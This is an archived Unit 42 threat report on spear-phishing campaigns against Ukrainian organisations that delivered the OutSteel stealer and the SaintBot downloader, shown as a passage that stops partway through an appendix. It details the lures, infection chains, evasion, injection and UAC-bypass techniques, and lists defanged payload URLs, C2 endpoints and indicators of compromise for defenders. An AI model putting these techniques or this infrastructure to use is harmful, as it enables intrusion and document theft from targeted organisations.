{
	"id": "bc0eaf36-c348-4fb4-a408-b85c5bf2fed0",
	"created_at": "2026-04-06T00:13:15.792357Z",
	"updated_at": "2026-04-10T03:37:08.591188Z",
	"deleted_at": null,
	"sha1_hash": "2dcf8a821046d08371dfd07bf2812c8c681d6b68",
	"title": "Spear Phishing Attacks Target Organizations in Ukraine, Payloads Include the Document Stealer OutSteel and the Downloader SaintBot",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6889834,
	"plain_text": "Spear Phishing Attacks Target Organizations in Ukraine, Payloads\r\nInclude the Document Stealer OutSteel and the Downloader SaintBot\r\nBy Unit 42\r\nPublished: 2022-02-26 · Archived: 2026-04-05 15:32:52 UTC\r\nExecutive Summary\r\nOn Feb. 1, 2022, Unit 42 observed an attack targeting an energy organization in Ukraine. CERT-UA publicly attributed the\r\nattack to a threat group they track as UAC-0056. The targeted attack involved a spear phishing email sent to an employee of\r\nthe organization, which used a social engineering theme that suggested the individual had committed a crime. The email had\r\na Word document attached that contained a malicious JavaScript file that would download and install a payload known as\r\nSaintBot (a downloader) and OutSteel (a document stealer). Unit 42 discovered that this attack was just one example of a\r\nlarger campaign dating back to at least March 2021, when Unit 42 saw the threat group target a Western government entity\r\nin Ukraine, as well as several Ukrainian government organizations.\r\nThe OutSteel tool is a simple document stealer. It searches for potentially sensitive documents based on their file type and\r\nuploads the files to a remote server. The use of OutSteel may suggest that this threat group’s primary goals involve data\r\ncollection on government organizations and companies involved with critical infrastructure. The SaintBot tool is a\r\ndownloader that allows the threat actors to download and run additional tools on the infected system. SaintBot provides the\r\nactors persistent access to the system while granting the ability to further their capabilities.\r\nWhile the OutSteel and SaintBot payloads were common among the attacks, the actors used different social engineering\r\nthemes and infection chains to compromise systems. 
The actors used current events and other pertinent themes to trick\r\nrecipients into opening documents, clicking links, enabling malicious content or running executables directly to compromise\r\ntheir systems. Early attacks in March and April 2021 used cryptocurrency and COVID themes, while we observed the actors\r\nusing law enforcement-related themes and fake resumes in the May-July 2021 and the February 2022 attacks. The use of law\r\nenforcement-related themes in attacks spanning several months suggests that the threat group favors this social engineering\r\ntheme in the absence of a trending topic or current event.\r\nThe use of email as the attack vector remains the same in all attacks carried out by this threat group. While the spear\r\nphishing emails are a common component, each attack uses a slightly different infection chain to compromise the system.\r\nFor instance, the actors have included links to Zip archives that contain malicious shortcuts (LNK) within the spear phishing\r\nemails, as well as attachments in the form of PDF documents, Word documents, JavaScript files and Control Panel File\r\n(CPL) executables. Even the Word documents attached to emails have used a variety of techniques, including malicious\r\nmacros, embedded JavaScript and the exploitation of CVE-2017-11882 to install payloads onto the system. 
With the\r\nexception of the CPL executables, most of the delivery mechanisms rely on PowerShell scripts to download and execute\r\ncode from remote servers.\r\nFor more comprehensive information about the Russia-Ukraine crisis, including an overview of known attacks and\r\nrecommendations for how to protect against possible threats, please see our post, “Russia-Ukraine Crisis: How to Protect\r\nAgainst the Cyber Impact.”\r\nPalo Alto Networks customers receive protections against the attacks described via products and services including Cortex\r\nXDR and the WildFire, Advanced URL Filtering and DNS Security security subscriptions for the Next-Generation Firewall.\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 1 of 28\n\nAttack Overview\r\nOn Feb. 1, 2022, Unit 42 observed threat actors sending a targeted email to an individual at an energy organization in\r\nUkraine. The email had the following attributes:\r\nFrom: mariaparsons10811@gmail[.]com\r\nSubject: Повідомлення про вчинення злочину (\u003credacted targeted individual’s name\u003e\r\nAttachment: Повідомлення про вчинення злочину (\u003credacted targeted individual’s name\u003e).docx\r\nThe email subject and the filename of the attached document translate from Ukrainian to Report on the commission of a\r\ncrime (\u003credacted targeted individual’s name\u003e). The email suggests that the individual was involved in criminal activity,\r\nwhich is likely part of the actor's social engineering efforts to convince the targeted individual to open the attachment. The\r\nmalicious Word document displays the following contents:\r\nFigure 1. A malicious Word document attached to a spear phishing email sent to a targeted individual at a\r\nUkrainian organization. 
The apparent redactions were added by the threat actor as a lure to induce the target to\r\nclick icons in the document.\r\nThe content within the attached document also follows the theme in the delivery email, as it appears to be a redacted\r\ncriminal investigation report from the National Police of Ukraine. The document instructs the user to click the icons with the\r\nexclamation point to display the redacted contents hidden by black bars over the text. Each of the supposedly redacted\r\npieces of content has an icon that, when double-clicked, runs malicious JavaScript (SHA256:\r\nb258a747202b1ea80421f8c841c57438ffb0670299f067dfeb2c53ab50ff6ded) that is embedded within the document. When\r\nthe user double-clicks the icon, Word effectively writes the following file to the system and runs it with Windows Script\r\nHost (wscript):\r\nC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\GSU207@POLICE.GOV.UA - Повідомлення (15).js\r\nThe JavaScript file will run the following process that in turn runs a PowerShell script:\r\nFigure 2. PowerShell one-liner.\r\nThe PowerShell one-liner above will download an executable from the following URL, save it to\r\n%PUBLIC%\\GoogleChromeUpdate.exe and execute it:\r\nhxxps://cdn.discordapp[.]com/attachments/932413459872747544/938291977735266344/putty.exe\r\nAccording to CERT-UA, this PowerShell one-liner also appears in another attack attributed to this group that occurred a few\r\ndays earlier on Jan. 
31.\r\nBased on our analysis of the payload that this attempted spear phishing attack leads to, which includes the SaintBot\r\ndownloader and the OutSteel document stealer, we suspect that the threat group’s goals for this attack involve exfiltrating\r\ndata from the energy organization.\r\nLinks to Prior Attacks\r\nCERT-UA mentioned that they track this activity using the moniker UAC-0056, while other organizations track this group\r\nwith the names TA471, SaintBear and Lorec53. Our research shows that these attacks have various overlaps with previous\r\nattack campaigns focused on other organizations in Ukraine and Georgia, as well as other nations’ assets local to Ukraine.\r\nThese overlaps involve the use of the SaintBot downloader, shared infrastructure and other common elements. Figure 3\r\nshows a timeline of the known attacks related to this threat group, specifically, the day the spear phishing emails were sent\r\nand the subject line of each email.\r\nFigure 3. A timeline of known attacks related to UAC-0056, showing the date spear phishing emails were sent\r\nand their subject lines.\r\nThe timeline shows several attacks between April and July 2021. There is then a gap of several months between the 2021\r\nattacks and attacks that have been observed in 2022. This is more likely due to a lack of visibility rather than a pause in\r\nactivity. We believe that the threat group did not pause their activity as we are aware of additional delivery documents and\r\npayloads that suggest additional attacks occurred during the apparently inactive periods on the timeline.\r\nDetails of known prior attacks associated with UAC-0056 are available in Appendix A. 
Attacks described in the appendix\r\ninclude:\r\nMarch 2021: An attack campaign against targets in Georgia using Bitcoin and COVID themes.\r\nApril 2021: Bitcoin-themed spear phishing emails targeting Ukrainian government organizations.\r\nMay 2021: Law enforcement-themed attacks targeting Ukrainian government organizations.\r\nJune 2021: Law enforcement-themed attack against a Ukrainian government organization.\r\nJuly 2021: Spear phishing attempt on a Western government entity in Ukraine.\r\nPayload Analysis for Feb. 2 Attack\r\nAs seen above, the actors leverage Discord’s content delivery network (CDN) to host their payload, which is a common\r\ntechnique that the threat group uses across many of their attacks. The use of Discord benefits threat actors since the\r\npopularity of Discord’s servers for gaming, community groups and other legitimate usage causes many URL filtering\r\nsystems to place a high degree of trust in its domain. Discord’s terms of service do not allow malicious use of its CDN, and\r\nthe company has been working to find and block abuses of its platform.\r\nIn this attack, this URL was hosting a malicious executable (SHA256:\r\nf58c41d83c0f1c1e8c1c3bd99ab6deabb14a763b54a3c5f1e821210c0536c3ff) that is a loader. This acts as the first stage of\r\nseveral in the overall infection chain, each of which has varying levels of complexity. Ultimately, this infection chain\r\nresults in the installation and execution of a document stealer called OutSteel, a loader Trojan called SaintBot, a batch script\r\nturned into an executable that disables Windows Defender and a legitimate Google Chrome installation executable.\r\nInitial Loader\r\nThe executable initially downloaded by the JavaScript in the delivery document is an initial loader Trojan, whose developers\r\nsigned using a certificate (SHA1: 60aac9d079a28bd9ee0372e39f23a6a92e9236bd) that has \"Electrum Technologies GmbH\"\r\nwithin the organization field. 
This is related to the Electrum Bitcoin wallet, as seen in the following:\r\nCertificate:\r\n    Data:\r\n        Version: 3 (0x2)\r\n        Serial Number:\r\n            3b:11:e7:6e:da:51:82:ce:c2:d4:e7:2d:8c:05:f6:9a\r\n    Signature Algorithm: sha256WithRSAEncryption\r\n        Issuer: C=US, O=thawte, Inc., CN=thawte SHA256 Code Signing CA - G2\r\n        Validity\r\n            Not Before: May 8 00:00:00 2020 GMT\r\n            Not After : May 8 23:59:59 2022 GMT\r\n        Subject: C=DE, ST=Berlin, L=Berlin, O=Electrum Technologies GmbH, CN=Electrum Technologies GmbH\r\nThis first-stage loader is a simple wrapper for the next few stages – these later stages will simply decrypt a DLL from its\r\nresources, before loading it into memory and invoking its entry point.\r\nFigure 4. Loading decrypted SHCore2.dll and invoking entry point.\r\nThe packer used to pack and obfuscate this initial loader allows a user to clone .NET assemblies from other .NET binaries,\r\nas well as to clone certificates. This explains how a large portion of the payload is taken from a legitimate library, as\r\nwell as the attached Electrum certificate.\r\nThe decrypted DLL, named SHCore2.dll, is also obfuscated, though interestingly, the obfuscator did not completely strip the\r\nclass names, as can be seen in Figure 5 below. This allows us to quickly gather some information on the functionality of the\r\nsample. While it may seem like the DLL is the final payload, it is merely another stager, which will decrypt and execute a\r\ntotal of four embedded binaries.\r\nFigure 5. SHCore2.dll classes.\r\nThe stager contains some interesting anti-analysis functionality, refusing to execute inside a virtual machine, and in some\r\ncases, on bare metal systems. 
While that makes it difficult to perform dynamic analysis, before performing any virtual\r\nmachine checks, the sample does call functions within the Class5_Decrypter class, which is responsible for decrypting the\r\nembedded payloads. This allows us to debug the sample and extract those payloads once decrypted.\r\nFigure 6. Decrypted “config” file in SHCore2.dll memory.\r\nThe four embedded binaries decrypted and executed by the stager include OutSteel, SaintBot, an executable that runs a\r\nbatch script to disable Windows Defender and the Google Chrome installer, as seen in Table 1.\r\nSHA256 Description\r\n7e3c54abfbb2abf2025ccf05674dd10240678e5ada465bb0c04a9109fe46e7ec OutSteel AutoIT file uploader\r\n0da1f48eaa7956dda58fa10af106af440adb9e684228715d313bb0d66d7cc21d PureBasic executable, used to drop a Disable Windows Defender batch file\r\n0f9f31bbc69c8174b492cf177c2fbaf627fcdb5ac4473ca5589aa2be75cee735 Legitimate Google Chrome installer\r\n82d2779e90cbc9078aa70d7dc6957ff0d6d06c127701c820971c9c572ba3058e SaintBot .NET Loader\r\nTable 1. Embedded binaries within the loader.\r\nAdditional Files Associated With the Attack\r\nBelow is a more detailed analysis of four additional files that come into play after the initial loader executes.\r\nOutSteel\r\nOutSteel is a file uploader and document stealer developed with the scripting language AutoIT. It is executed along with the\r\nother binaries listed in Table 1. It begins by scanning through the local disk in search of files containing specific extensions,\r\nbefore uploading those files to a hardcoded command and control (C2) server. In this sample, the C2 server it reaches out to\r\nis 185[.]244[.]41[.]109:8080, with the endpoint /upld/.\r\nFigure 7. 
OutSteel main file search loop.\r\nScanning is performed through the use of CMD commands, as seen below:\r\ncmd.exe /U /C DIR “\\Users\\Admin\\*.docx” /S /B/ A\r\nThe list of file extensions that OutSteel gathers using the commands above is shown in Table 2, and the choice of these\r\nextensions is likely an attempt to gather potentially sensitive files. These file types include documents for Microsoft Office\r\nsuite applications, Microsoft Access database files, Microsoft Outlook data files and various archive file types.\r\n*.doc *.ppt *.xls *.rtf *.accdb *.pst *.zip *.txt\r\n*.docx *.pptx *.xlsx *.dot *.pot *.ppa *.tar\r\n*.pdf *.dot *.csv *.mdb *.pps *.rar *.7z\r\nTable 2. File extensions gathered by OutSteel.\r\nThe command output will be read by the AutoIT payload, and each file will be uploaded to the C2, using the HTTP.au3\r\nlibrary.\r\nOnce the script has finished uploading all relevant files to the C2, it will then attempt to download a file to\r\n%TEMP%\\svjhost.exe from the secondary hardcoded C2 eumr[.]site. The downloaded payload is a sample of the SaintBot\r\n.NET loader, also extracted from the SHCore2 DLL, and if downloaded successfully, will be executed via the command line.\r\nFigure 8. OutSteel downloads SaintBot and executes rmm.bat.\r\nThe script comes to a close after creating a .bat file named rmm.bat in the current directory, which will delete itself and the\r\noriginal payload, prior to terminating any running cmd.exe processes.\r\nFigure 9. rmm.bat file contents.\r\nAt this point, the AutoIT script exits, leaving SaintBot residing in memory.\r\nwindows_defender_disable.bat\r\nThis batch file is used to disable Windows Defender functionality. It accomplishes this by executing multiple commands via\r\nCMD that modify registry keys and disable Windows Defender scheduled tasks. 
This script is open source and available\r\non GitHub, so there is no custom element to this specific sample. This is done to reduce the risk of the dropped payloads\r\nbeing detected by Windows Defender.\r\nFigure 10. windows_defender_disable.bat script.\r\nSaintBot .NET Loader\r\nThe SaintBot .NET loader is also composed of several stages, with varying levels of obfuscation. It begins by executing a\r\nsingle PowerShell one-liner, which results in the execution of cmd.exe, passing the command timeout 20. Once the timeout\r\ncompletes, the loader will resume.\r\nFigure 11. Execution of PowerShell one-liner.\r\nThe first layer of the loader will extract a reversed .NET binary from its resources, before flipping, loading into memory and\r\nexecuting it.\r\nFigure 12. Reversed binary within resources.\r\nThis secondary layer contains far more obfuscation than the first, also implementing obfuscation through obscurity with\r\naround 140 different classes. Also stored within these classes are several virtual machine and sandbox checks, such as\r\nchecking if Sbiedll.dll is present in the list of loaded modules, comparing the machine name to HAL9TH and the user name\r\nto JohnDoe, and checking the BIOS version for known virtual machine identifiers.\r\nFigure 13. Anti-VM check.\r\nThe quickest way to bypass these checks is to simply set a breakpoint on the Invoke() function and modify any values within\r\nmemory to make sure no matches are discovered by the sample.\r\nOnce all checks have been passed, the second stage of the loader will extract the SaintBot binary from its resources and\r\ndecrypt it. From there, it begins loading in different API calls, including VirtualAllocEx, WriteProcessMemory,\r\nCreateProcessA and SetThreadContext. 
These calls are used to spawn MSBuild.exe in a suspended state before injecting the\r\ndecrypted SaintBot binary into it, modifying the thread context to point to the malicious entry point and resuming the\r\nprocess.\r\nFigure 14. Loading process injection API.\r\nSaintBot Payload\r\nSaintBot is a recently discovered malware loader, documented in April 2021 by MalwareBytes. It contains capabilities to\r\ndownload further payloads as requested by threat actors, executing the payloads through several different means, such as\r\ninjecting into a spawned process or loading into local memory. It can also update itself on disk – and remove any traces of\r\nits existence – as and when needed.\r\nSHA-256: e8207e8c31a8613112223d126d4f12e7a5f8caf4acaaf40834302ce49f37cc9c\r\nUpon execution within the MSBuild process, SaintBot will perform several anti-analysis checks, as well as a locale check. If\r\nany of these checks fail, a batch script named del.bat is dropped to the %APPDATA% folder and executed, removing any\r\nSaintBot payload-linked files from the system.\r\nFigure 15. System locale checks.\r\nIf the checks are passed, the payload attempts to locate slideshow.mp4 from the %LOCALAPPDATA%\\zz%USERNAME%\r\npath, where slideshow.mp4 is actually a copy of ntdll.dll. If the file is not found, SaintBot assumes it has not yet been\r\ninstalled on the system and therefore jumps to the installation procedure. This involves creating a directory in the\r\n%LOCALAPPDATA% folder, with the name set to zz%USERNAME%. Then, the local ntdll.dll binary is copied over to the\r\nnewly created folder and renamed to slideshow.mp4. Along with that, a .vbs and .bat script are dropped, named\r\n%USERNAME%.vbs and %USERNAME%.bat. Once the installation routine is complete, the payload executes itself once\r\nagain and exits.\r\nFigure 16. 
Setting up core SaintBot folders.\r\nIf slideshow.mp4 is discovered on the initial check, it is used to load in the core API provided by ntdll.dll. This is done to\r\navoid any hooks placed on API calls within the original ntdll.dll by EDR/AV software.\r\nFigure 17. Resolving API through slideshow.mp4.\r\nAt this point, the payload then checks to see if it is running under the process name dfrgui.exe, and if not, it will spawn\r\ndfrgui.exe from the %SYSTEM% directory. The payload is then injected into the spawned dfrgui.exe process, using NtQueueApcThread\r\nto resume the process, and the original MSBuild process terminates.\r\nFigure 18. Injection into dfrgui.exe.\r\nIf SaintBot is running inside dfrgui.exe, it will confirm whether or not it is running with administrator privileges. If not, it\r\nwill attempt to bypass UAC using fodhelper.exe.\r\nFigure 19. Privilege escalation via fodhelper.exe.\r\nPersistence is then set up through the CurrentVersion\\Run registry key, and communication finally begins with the C2\r\nserver. This sample has a total of three C2 servers embedded within it, all reaching out to the same /wp-adm/gate.php\r\nendpoint.\r\nFigure 20. Hardcoded C2s.\r\nThis particular sample accepts six total commands from the C2 server:\r\nCommand Purpose\r\nde, de:regsvr32 Execute an EXE or DLL (using regsvr32) via cmd.exe\r\nde:LoadMemory Spawn copy of dfrgui.exe and inject downloaded executable into process\r\nde:LL Download DLL and load into memory with LdrLoadDll()\r\nupdate Update SaintBot binary\r\nuninstall Uninstall SaintBot from machine\r\nTable 3. 
SaintBot commands.\r\nConclusion\r\nUnit 42 research discovered a threat group targeting an energy organization that is part of Ukraine’s critical infrastructure.\r\nThis attack is part of a year-long campaign of attacks that not only targeted Ukrainian government organizations, but also\r\nforeign nations’ embassies in Ukraine. The threat group delivered a malicious payload called OutSteel that is capable of\r\nautomatically exfiltrating various types of files, including documents, archives, database files and files containing email-related data. Based on the list of targeted organizations and the use of a file exfiltration tool, we believe this threat group’s\r\nprimary goal is to steal sensitive information for the purpose of situational awareness and leverage in dealing with Ukraine.\r\nFor Palo Alto Networks customers, our products and services provide the following coverage associated with this campaign:\r\nCortex XDR protects endpoints from the SaintBot malware described in this blog.\r\nWildFire cloud-based threat analysis service accurately identifies the malware described in this blog as malicious.\r\nAdvanced URL Filtering and DNS Security identify domains associated with this attack campaign as malicious.\r\nUsers of the AutoFocus contextual threat intelligence service can view malware associated with these attacks using the\r\nSaintBot, SaintBot_Loader and OutSteel tags.\r\nPalo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber\r\nThreat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to\r\nsystematically disrupt malicious cyber actors. 
Learn more about the Cyber Threat Alliance.\r\nAdditional Resources\r\nA deep dive into SaintBot, a new downloader\r\nTargeted Phishing Attack Against Ukrainian Government Expands to Georgia\r\nSpearphising Attack Uses COVID 21 Lure to Target Ukrainian Government\r\nCERT-UA Post from July 13, 2021\r\nCERT-UA Post from Feb. 2, 2022\r\nRussia-Ukraine Crisis: How to Protect Against the Cyber Impact\r\nRussia-Ukraine Crisis Briefings: How to Protect Against the Cyber Impact\r\nPalo Alto Networks Resource Page: Protect Against the Cyber Impact of the Russia-Ukraine Crisis\r\nIndicators of Compromise\r\nDelivery Hashes\r\nPayload Hashes\r\n
b0e7352055b591a2b2cb1c2a76c53885dee66562dc\r\nf24ee966ef2dd31204b900b5c7eb7e367bc18ff92a13422d800c25dbb1de1e99\r\nf2bdde99f9f6db249f4f0cb1fb8208198ac5bf55976a94f6a1cebfb0d6c30551\r\nf4a56c86e2903d509ede20609182fbe001b3a3ca05f8c23c597189935d4f71b8\r\nf58c41d83c0f1c1e8c1c3bd99ab6deabb14a763b54a3c5f1e821210c0536c3ff\r\nfa1bc7d6f03a49af50f7153814a078a32f24f353c9cb2b8e3f329888f2b37a6e\r\nfad2e8293cf38eec695b1b5c012e187999bd94fbcad91d8f110605a9709c31b3\r\nff07325f5454c46e883fefc7106829f75c27e3aaf312eb3ab50525faba51c23c\r\nffad5217eb782aced4ab2c746b49891b496e1b90331ca24186f8349a5fa71a28\r\nRelated URLs\r\n1000018[.]xyz/soft-2/280421-z1z.exe\r\n1000018[.]xyz/soft/220421.exe\r\n1000020[.]xyz/soft/230421.exe\r\n1221[.]site/15858415841/0407.exe\r\n1221[.]site/1806.exe\r\n15052021[.]space/2405.exe\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 16 of 28\n\n150520212[.]space/0404.exe\r\n185.244.41[.]109:8080/upld/\r\n1924[.]site/soft/09042021.exe\r\n194.147.142[.]232:8080/upld/\r\n194.147.142[.]232:8080/upld/\r\n2215[.]site/240721-1.msi\r\n31.42.185[.]63:8080/upld/\r\n32689657[.]xyz/putty5482.exe\r\n32689658[.]xyz/putty5410.exe\r\n45.146.164[.]37:8080/upld/\r\n45.146.165[.]91:8080/upld/\r\n68468438438[.]xyz/soft/win230321.exe\r\n8003659902[.]space/wp-adm/gate.php\r\nbaiden00[.]ru/def.bat\r\nbaiden00[.]ru/win21st.txt\r\nbaiden00[.]ru/wininst.exe\r\nbit[.]ly/36fee98\r\nbit[.]ly/3qpy7Co\r\ncdn.discordapp[.]com/attachments/853604584806285335/854020189522755604/1406.exe\r\ncdn.discordapp[.]com/attachments/908281957039869965/908282786216017990/AdobeAcrobatUpdate.msi\r\ncdn.discordapp[.]com/attachments/908281957039869965/908310733488525382/AdobeAcrobatUpdate.exe\r\ncdn.discordapp[.]com/attachments/908281957039869965/911202801416282172/AdobeAcrobatReaderUpdate.exe\r\ncdn.discordapp[.]com/attachments/908281957039869965/911383724971683862/21279102.exe\r\ncdn.discordapp[.]com/attachments/932413459872747544/932976938195238952/loader.exe\r\ncdn.discordapp[.
]com/attachments/932413459872747544/938291977735266344/putty.exe\r\neumr[.]site/load4849kd30.exe\r\neumr[.]site/load74h74830.exe\r\neumr[.]site/up74987340.exe\r\nmain21[.]xyz/adm2021/gate.php\r\nmohge[.]xyz/install.exe\r\nname1d[.]site/123/index.exe\r\nname1d[.]site/def02.bat\r\nname4050[.]com:8080/upld/9C9C2F98\r\norpod[.]ru/def.exe\r\norpod[.]ru/putty.exe\r\nsmm2021[.]net/load2022.exe\r\nsmm2021[.]net/upload/antidef.bat\r\nsmm2021[.]net/upload/Nvlaq.jpeg\r\nsmm2021[.]net/wp-adm/gate.php\r\nstun[.]site/42348728347829.exe\r\nupdate-0019992[.]ru/testcp1/gate.php\r\nupdate0019992[.]ru/exe/update-22.exe\r\nupdate0019992[.]ru/gate.php\r\nupdate3d[.]xyz/\r\nwebleads[.]pro/public/readerdc_ua_install.exe\r\nwww.baiden00[.]ru/win21st.txt\r\nwww.update0019992[.]ru/exe/update-22.exe\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 17 of 28\n\ncdn.discordapp[.]com/attachments/908281957039869965/908310733488525382/AdobeAcrobatUpdate.exe\r\ncutt[.]ly/1bR6rsQ\r\nmohge[.]xyz/install.exe\r\nmohge[.]xyz/install.txt\r\nstun[.]site/zepok101.exe\r\nsuperiortermpapers[.]org/public/WindowsDefender-UA.exe\r\nDomains\r\n000000027[.]xyz\r\n001000100[.]xyz=\r\n1000018[.]xyz\r\n1000020[.]xyz\r\n1020[.]site\r\n1221[.]site\r\n15052021[.]space\r\n150520212[.]space\r\n1833[.]site\r\n1924[.]site\r\n2055[.]site\r\n2215[.]site\r\n2330[.]site\r\n3237[.]site\r\n32689657[.]xyz\r\n32689658[.]xyz\r\n68468438438[.]xyz\r\n8003659902[.]site\r\n8003659902[.]space\r\n9348243249382479234343284324023432748892349702394023[.]xyz\r\nbaiden00[.]ru\r\nbuking[.]site\r\ncoronavirus5g[.]site\r\neumr[.]site\r\nmain21[.]xyz\r\nmohge[.]xyz\r\nname1d[.]site\r\nname4050[.]com\r\norpod[.]ru\r\nsmm2021[.]net\r\nstun[.]site\r\nupdate-0019992[.]ru\r\nupdate0019992[.]ru\r\nupdate3d[.]xyz\r\nwww.baiden00[.]ru\r\nwww.lywdm[.]com\r\nwww.update0019992[.]ru\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 18 of 28\n\nIPv4 
Addresses\r\n185.244.41[.]109\r\n194.147.142[.]232\r\n31.42.185[.]63\r\n45.146.164[.]37\r\n45.146.165[.]91\r\nAdditional Infrastructure\r\n1000018[.]xyz\r\n1000019[.]xyz\r\n1000020[.]xyz\r\n1017[.]site\r\n1120[.]site\r\n1202[.]site\r\n1221[.]site\r\n15052021[.]space\r\n150520212[.]space\r\n150520213[.]space\r\n1681683130[.]website\r\n16868138130[.]space\r\n1833[.]site\r\n1924[.]site\r\n2055[.]site\r\n2215[.]site\r\n2330[.]site\r\n29572459487545-4543543-543534255-454-35432524-5243523-234543[.]xyz\r\n32689657[.]xyz\r\n32689658[.]xyz\r\n32689659[.]xyz\r\n33655990[.]cyou\r\n4895458025-4545445-222435-9635794543-3242314342-234123423728[.]space\r\n9832473219412342343423243242364-34939246823743287468793247237[.]site\r\n99996665550[.]fun\r\nalmamaterbook[.]ru\r\nbuking[.]site\r\ngetvps[.]site\r\ngiraffe-tour[.]ru\r\ngosloto[.]site\r\nname4050[.]com\r\nnoch[.]website\r\notrs[.]website\r\npolk[.]website\r\nsinoptik[.]site\r\nsony-vaio[.]ru\r\nhttps://unit42.paloaltonetworks.com/ukraine-targeted-outsteel-saintbot/\r\nPage 19 of 28\n\nAppendix A: Prior Attacks Associated With UAC-0056\r\nPrior attacks associated with UAC-0056 are described below, organized by the time of attack. For an overview of known\r\nattacks, please see the timeline in the “Links to Prior Attacks” section above.\r\nMarch 2021 Attacks\r\nAccording to MalwareBytes research, this threat group carried out an attack campaign in March 2021 on targets in Georgia\r\nusing Bitcoin and COVID themes. The researchers state that these attacks involve spear phishing, but we do not have\r\ntelemetry to confirm the targeted organizations, attack vector or the exact dates in which the attacks took place. The Bitcoin-themed attacks are very similar to those seen in later April attacks, as the PDF delivery documents had similar content that\r\nreferences Electrum bitcoin wallets, as seen in Figure 21.\r\nFigure 21a. 
Contents of PDF documents used in Bitcoin-themed attacks in March 2021.\r\nFigure 21b. Contents of PDF documents used in Bitcoin-themed attacks in March 2021.\r\nThe COVID-themed attacks reference a government organization in Georgia, which suggests that the threat group has\r\ninterests in other countries in the region in addition to Ukraine. The attack involved a Zip archive hosted at\r\nbgicovid19[.]com/assets/img/newCOVID-21.zip, which contains two malicious files and one decoy document, as listed in\r\nTable 4.\r\nFilename | SHA256 | Description\r\n!!! COVID-21.doc | 4fcfe7718ea860ab5c6d19b27811f81683576e7bb60da3db85b4658230414b70 | Delivery document that exploits CVE-2017-11882 to download www.baiden00[.]ru/win21st.txt\r\nNew Folder.lnk | 5d8c5bb9858fb51271d344eac586cff3f440c074254f165c23dd87b985b2110b | LNK shortcut that downloads baiden00[.]ru/wininst.exe\r\nletter from the Ministry of Labour, Health and Social Affairs of Georgia.pdf | 49a758bfe34f1769a27b1a2da9f914bc956f7fdbb9e7a33534ca9e19d5f6168c | Decoy document\r\nTable 4. Delivery documents used in the March attack.\r\nThe letter from the Ministry of Labour, Health and Social Affairs of Georgia.pdf document is a decoy, as it contains no\r\nmalicious content. The decoy content does show a document from the Ministry of Labour, Health and Social Affairs of\r\nGeorgia, as seen in Figure 22, which suggests that the target may have involved an organization in Georgia.\r\nFigure 22. Decoy document’s contents in suspected March 2021 attacks.\r\nApril 2021 Attacks\r\nIn April 2021, the threat group carried out an attack that involved a spear phishing email with a PDF document attached,\r\nwhich suggested the recipient could become rich by accepting Bitcoins, as seen in Figure 23. As first seen in research by\r\nAhnlab, these Bitcoin-themed attacks were specifically targeting Ukrainian government organizations.\r\nFigure 23. Contents of PDF documents used in Bitcoin-themed attacks.\r\nThe PDF document attached to the delivery email contains text that suggests the individual can access a Bitcoin wallet with\r\na large sum of money along with a link to download the wallet, as seen in Figure 24. The link cutt[.]ly/McXG1ft is\r\nshortened and points to the URL http://1924[.]site/doc/bitcoin.zip to download a Zip archive.\r\nFigure 24. Contents of PDF documents used in Bitcoin-themed attacks.\r\nThe Zip archive contains a LNK shortcut that runs a PowerShell script to download and execute a payload from\r\nhxxp://1924[.]site/soft/09042021.exe. The archive also contains a password.txt file that has the following contents, which\r\ninvolve an Electrum Bitcoin wallet that links back to the attacks against Ukraine on Feb. 1, 2022:\r\nWallet in folder.\r\nElectrum: https://electrum.org\r\nPassword for walletr is: btc1000000000usd\r\nAccording to Fortinet research, in April 2021, this threat group also carried out COVID-themed attacks on Ukrainian\r\ngovernment organizations. The email seen in Figure 25 includes a fake forwarded message meant to appear as\r\ncorrespondence between a government official and the World Health Organization (WHO). The email contains a link to a\r\nZip archive hosted on the legitimate who.int domain. However, the link points to a shortened link of\r\nhxxps://cutt[.]ly/LcHx2Ga instead.\r\nFigure 25. Delivery email in COVID-themed attacks.\r\nThe hxxps://cutt[.]ly/LcHx2Ga URL points to hxxp://2330[.]site/NewCovid-21.zip, which hosted a Zip archive (SHA256:\r\n677500881c64f4789025f46f3d0e853c00f2f41216eb2f2aaa1a6c59884b04cc) that contained the following files:\r\nCOVID-21.doc (SHA256: 9803e65afa5b8eef0b6f7ced42ebd15f979889b791b8eadfc98e7f102853451a)\r\nCOVID-21.lnk (SHA256: 2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d)\r\nGEO-CFUND-2009_CCM Agreement_Facesheet - signed.pdf (SHA256:\r\nbbab12dc486b1c6fcf9e343ec1474d0f8967de988444d7f838f1b4dcab343e8a)\r\nNew Folder.lnk (SHA256: 2b15ade9de6fb993149f27c802bb5bc95ad3fc1ca5f2e86622a044cf3541a70d)\r\nThe LNK shortcuts attempt to run a PowerShell script that will download an executable from the following URL, save it to\r\n%TEMP%\\WindowsUpdate.exe and execute it:\r\nhxxp://2330[.]site/soft/08042021.exe\r\nThe LNK shortcut downloads the executable from the URL above using the Start-BitsTransfer cmdlet, which is the same\r\ntechnique the threat group used to download the payload within the macro in the July 2021 attacks discussed below.\r\nMay 2021 Attacks\r\nIn May 2021, we saw the threat group sending targeted emails to two Ukrainian government organizations. The two\r\nemails had subjects of Заява №4872823 and Заява №487223/2, and both had the same message content that suggested the\r\nemail was from a senior investigator trying to contact the individual, as seen in Figure 26. The use of law enforcement\r\nrelated themes across May and June 2021, as well as in February 2022, suggests that the threat group favors this social\r\nengineering theme in the absence of a trending topic or current event.\r\nFigure 26. Spear phishing email sent to Ukrainian government organizations in May 2021.\r\nBoth of the delivery emails had the same attachment, specifically Заява №4872823-(20).cpl (SHA256:\r\nf4a56c86e2903d509ede20609182fbe001b3a3ca05f8c23c597189935d4f71b8), which is a Windows Control Panel File that\r\nacts as an initial downloader, fetching and executing a payload from:\r\n32689657[.]xyz/putty5482.exe\r\nThe Control Panel File saves the downloaded executable to %PUBLIC%\\puttys.exe and runs it using the WinExec 